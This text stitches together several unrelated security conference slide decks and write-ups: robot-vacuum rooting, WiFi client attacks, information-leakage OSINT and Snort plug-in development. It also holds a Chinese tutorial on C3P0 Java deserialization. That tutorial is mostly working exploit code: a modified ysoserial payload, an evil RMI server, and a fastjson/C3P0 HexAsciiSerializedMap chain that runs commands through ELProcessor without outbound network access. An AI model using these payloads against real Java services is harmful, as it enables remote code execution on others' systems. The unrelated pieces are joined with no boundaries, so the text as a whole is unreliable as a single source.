• Only way to prevent uploads: rooting
(08.08.2021) DEFCON 29 – Dennis Giese
72
Summary Dreame
• Devices are cheaper than Roborock
• Performant Hardware
• Valetudo support
– Full support since April 2021
• All current models can be rooted without soldering
– Applies to all devices released before Aug 2021
• Questionable remains in Software
https://valetudo.cloud/
(08.08.2021) DEFCON 29 – Dennis Giese
73
DUSTBUILDER
(08.08.2021) DEFCON 29 – Dennis Giese
74
Dustbuilder
• Website for building your own custom robot firmwares
– Reproducible builds
– Easy to use
– Works for Dreame, Roborock and Viomi
• Alternative to local building
– All tools are still published on Github
• URL: http://builder.dontvacuum.me/
(08.08.2021) DEFCON 29 – Dennis Giese
75
Acknowledgements
• Ben Helfrich
• Carolin Gross
• Cameron Kennedy
• Daniel Wegemer
• Erik Uhlmann
• Guevara Noubir
• Sören Beye
(08.08.2021) DEFCON 29 – Dennis Giese
76
Contact:
See: http://dontvacuum.me
Telegram: https://t.me/dgiese
Twitter: dgi_DE
Email: [email protected] | pdf |
S-C3P0反序列化
起因
一个关于 fastjson 不出网的利用方法,利用 C3P0 结合 ROME 二次反序列化注入内存马。
漏洞原理
yso源码
首先来看 yso 的构造链,以及如何生成 payload 。构造链:
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject -
> com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject -
> com.sun.jndi.rmi.registry.RegistryContext->lookup
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
* com.sun.jndi.rmi.registry.RegistryContext->lookup
* com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject
* com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject
*
* Arguments:
* - base_url:classname
* Yields:
* - Instantiation of remotely loaded class
* @author mbechler
*
*/
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-
java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {
序列化的过程,首先创建一个 PoolBackedDataSource 对象,然后通过反射将
connectionPoolDataSource 属性修改为 PoolSource 的实例化对象。所以此处查看一下序列化
的过程。
序列化过程
public Object getObject ( String command ) throws Exception {
int sep = command.lastIndexOf(':');
if ( sep < 0 ) {
throw new IllegalArgumentException("Command format is: <base_url>:
<classname>");
}
String url = command.substring(0, sep);
String className = command.substring(sep + 1);
PoolBackedDataSource b =
Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class,
"connectionPoolDataSource").set(b, new PoolSource(className, url));
return b;
}
private static final class PoolSource implements ConnectionPoolDataSource,
Referenceable {
private String className;
private String url;
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
return new Reference("exploit", this.className, this.url);
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException
{return null;}
public PooledConnection getPooledConnection () throws SQLException
{return null;}
public PooledConnection getPooledConnection ( String user, String
password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(C3P0.class, args);
}
}
类继承关系
根据类的继承关系,在序列化的时候进入到 PoolBackedDataSourceBase#writeObject() ,此
处应该已经通过反射修改了 this.connectionPoolDataSource 的值为 PoolSource ,而这个类
没有继承 Serializable 接口,会反序列化出错从而进入到 catch 的逻辑中。然后在进入到
indirector.indirectForm(this.connectionPoolDataSource) 中。
这个 var2 就是 PoolSource#getReference() 返回的 Reference 对象。这里面的 classFactory
和 classFactoryLocation 两个参数可以关注一下,后面应该有用。然后序列化的过程关注到
这。之后是反序列化的过程。
反序列化过程
反序列化入口
反序列化的入口在 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject()
中,所以具体来看看这个方法。
首先是或者这个 version ,然后 version 为1的话进入分支。此处进入分支之后可以看到,如果
对象是 IndirectlySerialized 的实例,就会执行 getObject 方法。根据上面的序列化过程,序
列化的对象 ReferenceSerialized 是 IndirectlySerialized 的实现类。那么反序列化过程接
着进入到 ReferenceSerialized#getObject() 方法中。
根据序列化的过程, this.reference 参数有值,其余全部为空,所以逻辑进入到第88行
ReferenceableUtils.referenceToObject(this.reference, this.name, var2,
this.env) 。
此处先是获取 Reference 对象初始化时传递的 classFactory 和 classFactoryLocation 两个参
数,然后如果 classFactoryLocation 不为空,可以通过 URLClassLoader 远程加载类。如果为
空,可以通过 Class.forName 进行本地类加载,然后执行类的构造方法,后续在执行
getObjectInstance() 方法。其中 forName 方法的 initialize 参数为 true ,那么给定的类如
果之前没有被初始化过,那么会被初始化。到此的话反序列化已经可以实现一个攻击了,可以通
过 URLClassLoader 加载远程类,或者可以直接加载本地类。
一点小思考
在反序列化的最后一个过程中,通过 Class.forName 的方式加载类,创建对象,然后执行对象的
getObjectInstence 方法,在之前关于 JNDI 高版本的绕过的实现原理中 ,RMI协议 绕过有利用
org.apache.naming.factory.BeanFactory 这个本地工厂进行绕过。后面执行的就是
org.apache.naming.factory.BeanFactory#getObjectInstance ,此处也正好是可以利用
的。我们先来看看 RMI 绕过的代码。
通过创建一个 ResourceRef 对象,然后绑定 org.apache.naming.factory.BeanFactory 工厂
类。接下来看看 ResourceRef 对象的初始化。
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class EvilRMIServer {
public static void main(String[] args) throws Exception {
System.out.println("[*]Evil RMI Server is Listening on port: 1088");
Registry registry = LocateRegistry.createRegistry(1088);
// 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为
org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
true,"org.apache.naming.factory.BeanFactory",null);
// 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见
BeanFactory.getObjectInstance代码
ref.add(new StringRefAddr("forceString", "a=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("a",
"Runtime.getRuntime().exec(\"notepad.exe\")"));
ReferenceWrapper referenceWrapper = new
com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("Object", referenceWrapper);
}
}
ResourceRef 继承自 Reference 类,然后构造方法中,首先调用 Reference 的构造方法,其中
传递的 factory 参数就是 org.apache.naming.factory.BeanFactory 工厂类,这个
factoryLocation 根据之前分析的逻辑,应该为空,这样就可以通过 Class.forName 去加载本
地类了。根据上面的分析,我们简单修改 PoolSource 的代码,如下:
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import org.apache.naming.factory.BeanFactory;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-
java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {
public Object getObject ( String command ) throws Exception {
PoolBackedDataSource b =
Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class,
"connectionPoolDataSource").set(b, new PoolSource());
那么此处就可以利用 EL 表达式去执行任意代码了。
C3P0-扩展攻击
return b;
}
private static final class PoolSource implements ConnectionPoolDataSource,
Referenceable {
private String className;
private String url;
public PoolSource(){}
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
//return new Reference("exploit", this.className, this.url);
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "",
"", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "a=eval"));
ref.add(new StringRefAddr("a",
"Runtime.getRuntime().exec(\"notepad.exe\")"));
return ref;
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException
{return null;}
public PooledConnection getPooledConnection () throws SQLException
{return null;}
public PooledConnection getPooledConnection ( String user, String
password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(C3P0.class, args);
}
}
JNDI 注入
这个和上面的利用方式一样,都需要出网,而且高版本 JNDI 注入存在诸多限制
hex序列化字节加载器
这种扩展攻击的利用方式不需要出网,利用二次反序列化可以利用其他的一些组件达到任意代码执
行的效果。利用场景:在一些非原生的反序列化(如 fastjson )的情况下, c3p0 可以做到不出
网利用。其原理是利用 fastjson 的反序列化时调用 userOverridesAsString 的 setter ,在
setter 中运行过程中会把传入的以 HexAsciiSerializedMap 开头的字符串进行解码并触发原生
反序列化。
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.*;
class Person {
public Object object;
}
public class TemplatePoc {
public static void main(String[] args) throws IOException {
String poc = "{\"object\":
[\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",
{\"jndiName\":\"rmi://localhost:8088/Exploit\", \"loginTimeout\":0}]}";
System.out.println(poc);
ObjectMapper objectMapper = new ObjectMapper();
objectMapper.enableDefaultTyping();
objectMapper.readValue(poc, Person.class);
}
public static byte[] toByteArray(InputStream in) throws IOException {
byte[] classBytes;
classBytes = new byte[in.available()];
in.read(classBytes);
in.close();
return classBytes;
}
public static String bytesToHexString(byte[] bArray, int length) {
StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) {
String sTemp = Integer.toHexString(255 & bArray[i]);
if (sTemp.length() < 2) {
sb.append(0);
}
sb.append(sTemp.toUpperCase());
}
return sb.toString();
}
}
package fastjson.example.bug;
首先触发父类的 setUserOverridesAsString 方法。
这个 fireVetoableChange() 方法会触发
WrapperConnectionPoolDataSource#setUpPropertyListeners() ,应该是使用的类似监听器
的原理。
之后再进入到 C3P0ImplUtils.parseUserOverridesAsString 方法当中,这里需要注意字符串
的截取,需要自己补充一个垃圾字符。
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import fastjson.example.use.User;
import java.beans.PropertyVetoException;
public class payload_ {
public static void main(String[] args) throws PropertyVetoException {
WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new
WrapperConnectionPoolDataSource();
wrapperConnectionPoolDataSource.setUserOverridesAsString("HexAsciiSerializedMap
13123");
}
}
整个逻辑基本就是这样的,用 fastjson 结合 c3p0 反序列化弹个记事本
package fastjson.example.bug;
import com.alibaba.fastjson.JSON;
import com.mchange.lang.ByteUtils;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
public class fastJsonAndC3P0 {
public static void main(String[] args) throws IOException,
NoSuchFieldException, IllegalAccessException {
String serialpayload=bytesToHex(getObject());
String s = ByteUtils.toHexAscii(getObject());
System.out.println(s);
String payload="
{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverrid
esAsString\":\"HexAsciiSerializedMap:"+s+"0\"}";
System.out.println(payload);
JSON.parseObject(payload);
//org.apache.el.ExpressionFactoryImpl
}
public static String bytesToHex(byte[] bytes) {
StringBuffer stringBuffer = new StringBuffer();
for (int i = 0; i < bytes.length; i++) {
String s = Integer.toHexString(bytes[i] & 0xFF);
if (s.length() < 2) {
s = "0" + s;
}
stringBuffer.append(s.toLowerCase());
}
return stringBuffer.toString();
}
private static byte[] getObject() throws NoSuchFieldException,
IllegalAccessException, IOException { //获取c3p0序列化对象
PoolBackedDataSource poolBackedDataSource = new PoolBackedDataSource();
Field connectionPoolDataSource =
PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource");
connectionPoolDataSource.setAccessible(true);
connectionPoolDataSource.set(poolBackedDataSource,new PoolSource());
ByteArrayOutputStream byteArrayOutputStream = new
ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new
ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(poolBackedDataSource);
return byteArrayOutputStream.toByteArray();
}
private static final class PoolSource implements ConnectionPoolDataSource,
Referenceable {
private String className;
private String url;
public PoolSource(){}
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
//return new Reference("exploit", this.className, this.url);
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "",
"", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "a=eval"));
ref.add(new StringRefAddr("a",
"Runtime.getRuntime().exec(\"notepad.exe\")"));
return ref;
//com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException
{return null;}
public PooledConnection getPooledConnection () throws SQLException
{return null;}
public PooledConnection getPooledConnection ( String user, String
password ) throws SQLException {return null;}
}
}
/*
注意:使用javax.el.ELProcessor需要添加两个依赖。
参考文章
1. c3p0的三个gadget
2. JAVA反序列化之C3P0不出网利用
3. Java安全之C3P0链利用与分析
4. 浅析高低版JDK下的JNDI注入及绕过
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>8.5.40</version>
</dependency>
<dependency>
<groupId>org.mortbay.jasper</groupId>
<artifactId>apache-el</artifactId>
<version>8.0.27</version>
</dependency> | pdf |
Shifting the Focus of
WiFi Security:
Beyond cracking your
neighbor's wep key
Who are we and why do you care?
Thomas “Mister_X” d'Otreppe de Bouvette
Founder of Aircrack-ng
Rick “Zero_Chaos” Farina
Aircrack-ng Team Member
Embedded Development
FD: Also works for a WIPS Vendor
DISCLAIMER:
Some of the topics in this presentation
may be used to break the law in new and
exciting ways…
of course we do not recommend breaking
the law and it is your responsibility to
check your local laws and abide by them.
DO NOT blame us when a three letter
organization knocks on your door.
History of WEP Attacks / Why it doesn’t work
Passively Sniff for a long time
Slow, not enough data, impatient
No more weak ivs
Replay/Injection Attacks
Fast but very noisy
Simple signatures
AP features that try to block (PSPF)
History of WPA Attacks / Why it doesn’t work
Pre-shared key
Requires catching both sides of a quick
handshake
Must be in range of client and AP
Enterprise
Nearly impossible to crack passively
Most EAP types are difficult (at best) to MiTM
The Well Guarded Door
Nearly 100% of attacks focus on the AP
APs are getting more and more secure
New features built into AP
PSPF / Client Isolation
Strong Authentication / Encryption
Lightweight controller based architecture
APs are no longer the unguarded back door
Well deployed with for thought for security
Well developed industry best practices
Take the Path of Least Resistance
Attack the Clients!
Tools have slowly appeared recently
Difficult to use
Odd requirements to make function
Attacking Client WEP Key
Wep0ff
Caffe-Latte
Caffe-Latte Frag
Attacking Client WPA Key
WPA-PSK
No public implementation
WPA-ENT
Freeradius-wpe (thanks Brad and Josh!)
Requires hardware AP
Attacking the Client
Many Separate Tools
Difficult to configure
Typically sparsely documented
Odd requirements and configurations
Until now…
Introducing Airbase-ng
Merges many tools into one
New and improved, simplified implementations
Full monitor mode AP simulation, needs no
extra hardware
Easy, fast, deadly (to encryption keys at least)
Airbase-ng Demo
Evil Twin / Honey Pot
Karma
WEP attacks
WPA-PSK attacks
WPA-Enterprise attacks (if completed in
time)
What are you, a blackhat?
No seriously, this doesn’t promise a win
There are ways to defend as well
APs are finally being configured securely,
now clients must be as well
Simple Defenses
Proper Secure Client Configurations
Check the right boxes
GPO
(Still in process of completing this section,
please download final slides from link at
the end of presentation)
Beyond the Basics
Wireless Intrusion Detection and Prevention
Systems designed to detect attacks and
sometimes even prevent them
(Full explanation of WIPS systems and
features will follow, with no vendor bashing,
however Rick is still gaining permissions
required by his employer so this section will be
left uncompleted for now)
A Step Beyond Crazy
WiFi Frequencies
.11b/g 2412-2462 (US)
.11a 5180-5320, 5745-5825 (US)
Does this look odd to anyone else?
Licensed Bands
Some vendors carry licensed radios
Special wifi cards for use by military and
public safety
Typically expensive
Requires a license to even purchase
Frequencies of 4920 seem surprisingly
close to 5180
Can we do this cheaper?
Atheros and others sometimes support
more channels
Allows for 1 radio to be sold for many
purposes.
Software controls allowed freqencies
Who Controls the Software?
Sadly, typically the chipset vendors
Most wifi drivers in linux require binary
firmware
This firmware controls regulatory
compliance as well as purposing
What can we do?
Fortunately, most linux users don’t like
closed source binaries
For many reasons, fully open sourced
drivers are being developed
As these drivers become stable, we can
start to play
Let’s Play…
Madwifi-ng is driven by a binary HAL
Ath5k is the next gen fully open source
driver
Kugutsumen released a patch for
“DEBUG” regdomain
Allows for all supported channels to be
tuned to
New Toys
Yesterday
.11b/g 2412-2462 (US)
.11a 5180-5320, 5745-5825 (US)
Today
.11a 4920-6100 (DEBUG)
What to do now?
What is on this new frequencies?
(insert full image of frequency map)
But does it really work?
Spectrum Analyzer Demo
Fully tested frequencies
(finish complete testing)
Warning: This may differ from card to card
Limitations
Many real licensed implementations are broken
Card reports channel 1 but is actually on
4920MHz
This is done to make is easy to use existing
drivers
This breaks many open source applications
Airodump-ng
Airodump-ng now supports a list of
frequencies to scan rather than channels
Only channels are shown in display, may
be wrong
Strips vital header information off of packet
so data saved from extended channels is
useless
Kismet
At time of writing is unable to handle most
of the extended channels
Displays channels not frequencies
Does save usable pcap files
Improvement Needed
Sniffers are two trusting, they believe what
they see
Never intended to deal with oddly broken
implementations such as channel number
fudging
Sniffers need to be improved to report
more reality, and less assumptions
Final Thoughts
Remember everyone here is a white hat
Please use your new found knowledge for
good not evil
In the United States it is LEGAL to monitor
all radio frequencies (except those used
by cell phone)
Have fun…
Thanks
Updated Slide Presentation can be found at:
http://www.aircrack-ng.org/defcon16.ppt
Bibliography
http://www.willhackforsushi.com/FreeRADIUS-WPE.h
etc | pdf |
Information Leakage
or
Call a Plumber ---
your Info is Leaking
Joe Klein, CISSP
Sr. Security Engineer, AVAYA
[email protected]
Overview
Background for this Speech
What is Information Leakage?
What is the Risk?
Types of Information Leakage?
Technical
People
Process
How to Protect?
Background of the speech
Art of War –
Not know yourself nor the enemy, you are
lost
Knows yourself, but not the enemy and you
are not likely to win
One who knows themselves and the enemy is
certain to win
Sophistication of Attacker vs
Level or Protection
Level of Protection
None
Average
High
Sophistication of Attacker
Low
Mid
High
Unsuccessful Attack
Discovered
Successful Attack
Undiscovered
Legal/Regulatory
Requirements
Best Practices
Perfect
Security
What is Information Leakage(IL)?
Information which is released
purposefully or accidentally,
placing your staff, intellectual property,
systems and networks
at risk.
What is the Risk of IL?
Greatly improves the success of an
attacker
Places the organization at a competitive
disadvantage
Places organization at legal risk
Can lead to physical harm of staff and
facilities
Types of Information Leakage?
Technology
People
Process
Technical
Passive
Listening
Sniffers, scanning frequencies
Active
Integration
War driving, war dialing, scanning networks
Technical
Layer 2
Mac Address, SSID, Frequency Used
Identify Make of systems
Layer 3
Active
nmap, qoso, xprobe, icmp, packeto
Passive
Sniffers, Kismet, radio scanner, etc
Technical
Layer 4 and above
SNMP
System – processes, software, configurations
Network – internal networks, routes, protocols
Application Servers
Web sites: http://www.netcraft.com/
Chat, E-mail, Usenet, Mailing Lists
Look at header information of posting
Applications
See BH 2003 - - for details
Technical
Special Cases
Firewalls
Firewalk
Firewall Fingerprint papers
Tempest – Emissions
Electro Magnetic
Other
Surveillance Devices
People
Posting information on website
http://www.target.com
http://www.google.com/advanced_search?hl=en
Use domain option
http://webdev.archive.org/
http://www.google.com
Technical Records
www.ARIN.net, www.whois.net
Marketing Material, Advertisements, Press releases
http://www.cyberalert.com/
http://www.inboxrobot.com/
Tradeshows
The „bar‟, smokers lounge, organizational parties
People
Technical staff
Call to Vendor Technical Support
Gives full configurations, including passwords and network
design to get help on problem
Outsourcing of Technical Support
Cisco, Microsoft, Oracle, Peoplesoft and others
Outsource Companies have a lower security requirements then
original company
Posting questions on Internet (Usenet news,
webpage‟s, etc)
http://tile.net/
http://www.google.com/advanced_group_search?hl=en
http://www.robofetch.com/
People
Management
“Exception to Security Rules”
Other
DR Drills
People
Posting résumés, anonymous comments on
“Financial Comment Board”,
Fu*kedcompany.com, etc
Job Postings
http://hotjobs.yahoo.com/
http://www.brassring.com/
http://www.net-temps.com/
http://www.monster.com/
http://www.careerbuilder.com/
Social engineering call‟s
Mail/E-Mail deliveries
Trojans, backdoors
People
News Searches
http://www.newsindex.com/
http://library.uncg.edu/news/
http://www.totalnews.com/
http://www.upi.com/
http://www.thepaperboy.com.au/welcome.ht
ml
http://www.onlinenewspapers.com/
People
Address Phone Number
http://www.switchboard.com/
http://finder.geoportals.com/
http://www.infospace.com/
http://www.infobel.com/world/default.asp
Other Personal Records
$ http://www.ussearch.com/wlcs/index.jsp
http://www.whowhere.lycos.com/
Genealogy
http://ancestry.lycos.com/
Phone Reverse Lookup
http://www.anywho.com/rl.html
People
E-Mail Address
http://mesa.rrzn.uni-hannover.de/
Class Mate.com
http://search.classmates.com/user/search/adv.tf
ICQ
http://web.icq.com/whitepages/location/0,,,00.html
Public Records
http://www.constructionweblinks.com/Industry_Topic
s/Public_Records/public_records.html
http://www.searchsystems.net/
People
Hidden Gems
Intelliseek
http://www.invisibleweb.com
http://www.prefusion.com
Invisible-web.net
http://www.invisible-web.net/
Librarians‟ Index to the Internet
http://www.lii.org
Questia
http://www.questia.com/
Process
Paper
Paper (Dumpster Diving)
Backups
Tapes, CD‟s, DVD‟s and floppy's
Technology
Hard Drives, PDA‟s, Cell Phones
Cleaning Staff
Can they be trusted? Are you sure?
Process
Posting by the Government
Financials & Personal Information
http://www.sec.gov/edgar.shtml
http://www.hoovers.com/
http://www.searchsystems.net/
http://www.infotoday.com/
http://www.dnb.com/us/
http://www.aicpa.org/yellow/ypgsec.htm
Partners & Vendors Disclose Relationships
Google - link: target.com
http://amexb2b.disk11.com
How to Protect?
People:
Limit what is posted publicly to the net
Education staff about danger
Process
Perform/Have someone perform a Competitive Intelligence
search on a regular bases
“extreme damage” items must be removed „from view‟
Technology
Consider changing banners on systems
General:
Create a classification system based on the risk
No damage to organization or people
Some damage to organization and/or people
Extreme damage to organization and/or people
Consider posting a few slivers of information – Misinformation
Perform all the other „best practices‟ in security
Information Leakage
or
Call a Plumber ---
your info is leaking
Joe Klein, CISSP
Sr. Security Engineer, AVAYA
[email protected] | pdf |
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Snort Plug-in Development:
Teaching an Old Pig New Tricks
Ben Feinstein, CISSP GCFA
SecureWorks Counter Threat Unit™
DEFCON 16
August 8, 2008
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Snort v2 Architecture & Internals
•
Snort Plug-in Development
Dynamic Rules
Dynamic Preprocessors
•
Snort Plug-in API
Examples, Pitfalls, Tips
•
Releasing two Dynamic Preprocessors
ActiveX Virtual Killbits (DEMO)
Debian OpenSSL Predictable PRNG Detection (DEMO)
What’s In This Talk?
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Open-source IDS created by Marty Roesch
•
First released for *NIX platforms 1998
•
Commercialized by Sourcefire, Inc.
•
Snort Inline mode now available for IPS
Linux Bridge + Netfilter
Linux ip_queue and nf_queue interfaces
•
Snort v3 now making its way through Beta
NOT discussing plug-ins for v3
NOT discussing v3 architecture (ask Marty)
Snort Basics
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Highly modularized for extensibility
•
Snort Rules & The Rules Matching Engine
SF Engine Dynamic Plug-in
Detection Plug-ins – implement/extend rules language
•
Output Plugins
Unified / Unified2
Syslog
Others
•
Preprocessors
Detection (i.e. alerting)
Normalization (i.e. decoding)
Snort v2 Architecture
The Basics
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Dynamic Preprocessors
Define a packet processing callback
Preprocessor local storage
Stream-local storage
•
Dynamic Rules
Writing Snort rules in C
v2.6.x (?), added ability to register a C callback
• Before, only useful as form of rule obfuscation
Used by some commercial Snort rulesets
Relatively straight forward to RE using IDA Pro
Snort v2 Architecture
Run-time (Dynamic) Extensions
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Alert vs. Log
Log contains packet capture data in addition
•
Unified2 is extensible
Additional data in simple Length|Value encoding
•
Does your detection preprocessor need to log additional
alert data?
Use Unified2!
•
Examples
Portscan Alerts
Preprocessor Stats
Other Snort Internals of Interest
Unified2 Output Formats
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Familiarity with the C language
•
Lack of code-level documentation
What is available is out of date
•
Snort-Devel mailing list
Sourcefire developers are very responsive, thanks!
Do your homework before mailing the list.
You will get a better response and save everybody time.
•
Source contains very basic examples
Dynamic Rules
Dynamic Preprocessor
Snort Plug-in Development
Getting Started
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Use the Source!
•
Examine existing plug-ins
SMTP
DNS
SSH
SSL
HTTP Inspect (bigger)
•
Write small blocks of code and (unit) test them
•
Ask questions on the Snort-Devel mailing list
Snort Plug-in Development
Getting Started, Continued
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Snort 2.8.x source tarball
•
CentOS 5
gcc 4.1
glibc 2.5
•
GNU Autoconf 2.61
CentOS 5 packages older version 2.59
•
GNU Automake 1.10
CentOS 5 packages older version 1.9.6
Snort Development Environment
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Key header file "sf_snort_plugin_api.h"
Defines C-struct equivalents to rule syntax
•
You define global variable
Rules *rules[]
Framework will handle the rest
•
Makefile
Compile C files into object code
Use GNU Libtool to make dynamic shared objects
•
Dynamically loaded by Snort at run-time
Snort Dynamic Rules
Background
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Snort config
--dynamic-detection-lib <.so file>
--dynamic-detection-lib-dir <path to .so file(s)>
•
Snort can create stub rules files for all loaded dynamic rules
--dump-dynamic-rules <output path>
•
"meta rules" must be loaded in Snort rules file
alert tcp any any -> any any (msg:"Hello World!"; […]
metadata : engine shared, soid 3|2000001;
sid:2000001; gid:3; rev:1; […] )
Snort Dynamic Rules
Configuration
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Different C structs for each rule option in rules language
•
A Rule Option is a Union of different specific rule opt structs
•
Rule struct w/ NULL-terminated array of Rule Options
Rule Header
Rule References
•
Functions for matching
content, flow, flowbits, pcre, byte_test, byte_jump
•
Function to register and dump rules
Snort Plug-in API
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
static ContentInfo sid109content =
{
(u_int8_t *)"NetBus",
/* pattern to search for */
0,
/* depth */
0,
/* offset */
CONTENT_BUF_NORMALIZED,
/* flags */
NULL,
/* holder for aho-corasick info */
NULL,
/* holder for byte representation of "NetBus" */
0,
/* holder for length of byte representation */
0
/* holder of increment length */
};
Snort Plug-in API
Content Matching
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
static RuleOption sid109option2 =
{
OPTION_TYPE_CONTENT,
{
&sid109content
}
};
ENGINE_LINKAGE int contentMatch(void *p, ContentInfo*
content, const u_int8_t **cursor);
Snort Plug-in API
Content Matching (Continued)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
static PCREInfo activeXPCRE =
{
"<object|\snew\s+ActiveX(Object|Control)",
NULL,
NULL,
PCRE_CASELESS,
CONTENT_BUF_NORMALIZED
};
static RuleOption activeXPCREOption =
{
OPTION_TYPE_PCRE,
{
&activeXPCRE
}
};
Snort Plug-in API
PCRE Matching
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
ENGINE_LINKAGE int pcreMatch(void *p, PCREInfo* pcre,
const u_int8_t **cursor);
Snort Plug-in API
PCRE Matching (Continued)
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
static FlowFlags activeXFlowFlags = {
